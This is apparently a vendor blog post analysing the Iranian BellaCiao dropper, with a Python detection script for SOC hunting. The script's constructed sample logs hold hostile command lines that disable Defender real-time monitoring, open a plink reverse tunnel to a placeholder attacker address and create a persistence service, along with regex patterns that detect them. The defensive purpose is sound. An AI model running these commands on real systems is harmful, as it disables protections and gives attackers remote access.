BellaCiao: The New Malware From Iran’s Charming Kitten

The Protest Coming From The Darkside


Bitdefender Labs has recently identified a new malware family, BellaCiao, attributed to the Iranian threat actor Charming Kitten. BellaCiao is a personalized dropper: each build is tailored to one victim and delivers further payloads to the compromised machine according to instructions received from attacker-controlled infrastructure. The available evidence points to initial access through the exploitation of vulnerable internet-facing applications rather than phishing or drive-by downloads, and once BellaCiao is in place it gives the attackers a persistent foothold from which to steal sensitive data or disrupt critical operations.

A dropper is malware whose job is to install other malware, such as backdoors or web shells, on a compromised host. The payload may be embedded inside the dropper in an obfuscated form that slips past antivirus scanning, or the dropper may download and install it from a remote server once it runs. Either way, the dropper is the stage that turns an initial foothold into a lasting presence on the host.

BellaCiao is built per victim: each sample is tied to one target and carries hard-coded details such as the organization's name and its public IP address. Debugging information and file paths left in the executables show that the operators organize their builds by country code, among them IL (Israel), TR (Turkey), AT (Austria), IN (India) and IT (Italy).

BellaCiao itself is only the dropper; the payloads it delivers do the follow-on work. The initial infection vector has not been confirmed, but the indications are that the attackers exploited a known vulnerability in internet-facing software, with Microsoft Exchange among the likely candidates.

Charming Kitten


Charming Kitten (also tracked as APT35, with overlapping activity reported under names such as APT42, Phosphorus, Mint Sandstorm, NewsBeef, Newscaster, Parastoo and Ajax Security Team) is an Iranian state-sponsored group that has been active since at least 2013 and has targeted numerous organizations in Europe, the Middle East and the United States.

Microsoft, which associates the group with Iran's Islamic Revolutionary Guard Corps (IRGC), has reported that it carried out attacks on U.S. critical infrastructure in late 2021 and early 2022.

Charming Kitten relies on spear phishing aimed at specific individuals or organizations, watering-hole attacks and the takeover of social media accounts. It has been linked to high-profile campaigns against the United Nations, the European Union and the Saudi government, and it has also been reported to target U.S. presidential election campaigns.

Charming Kitten is a capable group that continually adapts its tactics. It uses a variety of malware, including custom-built backdoors and remote access tools, alongside repurposed legitimate utilities, and it has repeatedly shown that it can compromise and persist in enterprise environments.

How Does BellaCiao Work?


The attackers gain initial access by exploiting known vulnerabilities in internet-facing applications such as Zoho ManageEngine or Microsoft Exchange Server, and then deploy BellaCiao. Once running, the malware periodically issues a DNS query for a subdomain under attacker control. The instruction is encoded in the answer: the IP address the subdomain resolves to tells the malware which action to take on the compromised machine, so no conventional command-and-control session is needed and the traffic looks like ordinary DNS resolution.

The first action in the observed chain is dropping a web shell. A second BellaCiao variant replaces the web shell with Plink, the command-line connection tool from the PuTTY suite, and uses it to open a reverse tunnel (SSH port forwarding) to a remote attacker server, through which the backdoor functionality is provided.

To maintain a persistent presence on the infected system, BellaCiao attempts to turn off Microsoft Defender with a PowerShell command and registers itself as a Windows service.
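The chain described in the three paragraphs above (DNS-based tasking, a web shell or Plink reverse tunnel, then Defender tampering and a service for persistence) is what a SOC would hunt for. The following Python script is an added example written for this page, not Bitdefender's or Brandefense's code. It runs over constructed Sysmon-style DNS and process-creation events and flags a process resolving the same subdomain at a regular interval, a PowerShell `Set-MpPreference -DisableRealtimeMonitoring $true` command (the standard cmdlet for this; the exact command BellaCiao runs is not quoted on this page, so that pattern is an assumption), a `plink` launch with a `-R` reverse forward, and a service created with `sc create` or `New-Service`. All hostnames, paths, domains, addresses and command lines are constructed.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs) in a Sysmon-like shape:
# id 22 = DNS query, id 1 = process creation. Hostnames, images, the query
# name, addresses and command lines are all made up for this example.
def _t(minutes, seconds=0):
    return datetime(2023, 4, 26, 10, 0, 0) + timedelta(minutes=minutes, seconds=seconds)

DROPPER = "C:\\ProgramData\\Updater\\svc.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed name shaped like the per-victim data (country code, org, public IP).
C2_QUERY = "il-acme-203-0-113-5.updates-example.test"

SAMPLE_EVENTS = [
    # Beaconing: the dropper resolves the same subdomain roughly every 5 minutes.
    {"time": _t(0), "id": 22, "host": "WEB01", "image": DROPPER, "query": C2_QUERY, "answer": "192.0.2.10"},
    {"time": _t(5, 2), "id": 22, "host": "WEB01", "image": DROPPER, "query": C2_QUERY, "answer": "192.0.2.10"},
    {"time": _t(10, 1), "id": 22, "host": "WEB01", "image": DROPPER, "query": C2_QUERY, "answer": "192.0.2.10"},
    {"time": _t(15, 3), "id": 22, "host": "WEB01", "image": DROPPER, "query": C2_QUERY, "answer": "192.0.2.10"},
    # The answer changes: in this scheme the resolved address is the instruction.
    {"time": _t(20, 0), "id": 22, "host": "WEB01", "image": DROPPER, "query": C2_QUERY, "answer": "192.0.2.11"},
    # Benign noise: a browser looks up one site at irregular times.
    {"time": _t(1), "id": 22, "host": "WEB01", "image": "firefox.exe", "query": "www.example.com", "answer": "93.184.216.34"},
    {"time": _t(17), "id": 22, "host": "WEB01", "image": "firefox.exe", "query": "www.example.com", "answer": "93.184.216.34"},
    {"time": _t(18), "id": 22, "host": "WEB01", "image": "firefox.exe", "query": "www.example.com", "answer": "93.184.216.34"},
    # Follow-on actions after the answer changed: Defender off, Plink reverse tunnel, new service.
    {"time": _t(20, 5), "id": 1, "host": "WEB01", "image": PS,
     "cmdline": "powershell.exe -exec bypass -c \"Set-MpPreference -DisableRealtimeMonitoring $true\""},
    {"time": _t(20, 9), "id": 1, "host": "WEB01", "image": "C:\\ProgramData\\plink.exe",
     "cmdline": "plink.exe -ssh -batch -R 8080:127.0.0.1:80 -l tunnel -pw ****** 198.51.100.20"},
    {"time": _t(20, 12), "id": 1, "host": "WEB01", "image": "C:\\Windows\\System32\\sc.exe",
     "cmdline": "sc.exe create UpdaterSvc binPath= \"" + DROPPER + "\" start= auto"},
    # Benign admin activity that must not fire.
    {"time": _t(25), "id": 1, "host": "WEB01", "image": PS, "cmdline": "powershell.exe -c \"Get-MpPreference\""},
]


def find_dns_beacons(events, min_queries=4, max_jitter=0.25):
    """Flag (host, image, query) triples resolved at near-constant intervals.
    Jitter is the relative standard deviation of the gaps between queries;
    a user or a browser rarely produces gaps this regular."""
    groups = defaultdict(list)
    for e in events:
        if e["id"] == 22:
            groups[(e["host"], e["image"], e["query"])].append(e)
    findings = []
    for (host, image, query), evs in groups.items():
        if len(evs) < min_queries:
            continue
        times = sorted(e["time"] for e in evs)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            findings.append({"host": host, "image": image, "query": query,
                             "interval_s": round(mean),
                             "answers": sorted({e["answer"] for e in evs})})
    return findings


# Command-line patterns for the follow-on steps. Set-MpPreference is the
# standard cmdlet for turning off Defender real-time monitoring; the exact
# command the malware runs is not quoted on this page, so this is an assumption.
PROCESS_RULES = [
    ("defender_realtime_disabled",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true", re.I)),
    ("plink_reverse_tunnel", re.compile(r"\bplink(\.exe)?\b.*\s-R\s+\d+:")),
    ("service_created", re.compile(r"\b(sc(\.exe)?\s+create\b|New-Service\b)", re.I)),
]


def find_suspicious_processes(events):
    """Match process-creation command lines against PROCESS_RULES."""
    findings = []
    for e in events:
        if e["id"] != 1:
            continue
        for name, pattern in PROCESS_RULES:
            if pattern.search(e["cmdline"]):
                findings.append({"host": e["host"], "rule": name, "cmdline": e["cmdline"]})
    return findings


def assess_host(events, host):
    """Combine the signals for one host. A beacon alone is a lead; a beacon
    followed by Defender tampering, a reverse tunnel or a new service is
    strong evidence of the chain described above."""
    beacons = [b for b in find_dns_beacons(events) if b["host"] == host]
    rules = sorted({p["rule"] for p in find_suspicious_processes(events) if p["host"] == host})
    return {"host": host, "beacons": beacons, "rules": rules, "score": len(beacons) + len(rules)}


if __name__ == "__main__":
    result = assess_host(SAMPLE_EVENTS, "WEB01")
    print(f"{result['host']}: score {result['score']}, rules {result['rules']}")
    for b in result["beacons"]:
        print(f"  beacon every {b['interval_s']}s: {b['image']} -> {b['query']} answers {b['answers']}")
```

On the constructed data the beacon detector reports one triple (the dropper resolving the C2 name every 300 seconds with two distinct answers) and ignores the browser's irregular lookups, and the three process rules each fire once while the benign `Get-MpPreference` does not. In production, feed real Sysmon event ID 22 and ID 1 records (or the EDR equivalent) into the same functions and tune `min_queries` and `max_jitter` to the beacon interval you expect; the point of combining the signals per host is that a regular DNS lookup on its own is a lead, while the same host then disabling Defender or starting a reverse tunnel is an incident.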

How to Protect Yourself?


Defending against an intrusion like BellaCiao calls for defense in depth: several independent controls, so that the failure of one does not give the attacker a free run. The first layer is reducing the attack surface, above all by patching and restricting exposure of internet-facing applications such as Exchange and ManageEngine, since that is where this campaign begins.

Automated protection controls catch and block most incidents before they cause damage, and IP, domain and URL reputation checks are among the most effective ways to stop automated exploitation attempts. For more information on the malware, including indicators of compromise (IoCs) and technical details, see the Bitdefender website.

How Can Brandefense Help You?


Today, any service or technology running on a domain or IP address is quickly discovered when it becomes publicly accessible, and attacks begin almost immediately. With Brandefense’s attack surface discovery service, we effectively capture a snapshot of your attack surface and monitor its risks and developments.

By conducting regular scans, we identify potential vulnerabilities and communicate any concerns to our clients. This proactive approach ensures that your organization remains vigilant and responsive to potential threats, safeguarding your digital brand from would-be attackers and maintaining a strong security posture in an ever-evolving digital landscape.

Incorporating Brandefense into your all-encompassing cybersecurity strategy lets your organization stay ahead of ever-evolving digital threats. Through proactive monitoring and addressing potential risks, you can safeguard your valuable assets and maintain a robust security posture.
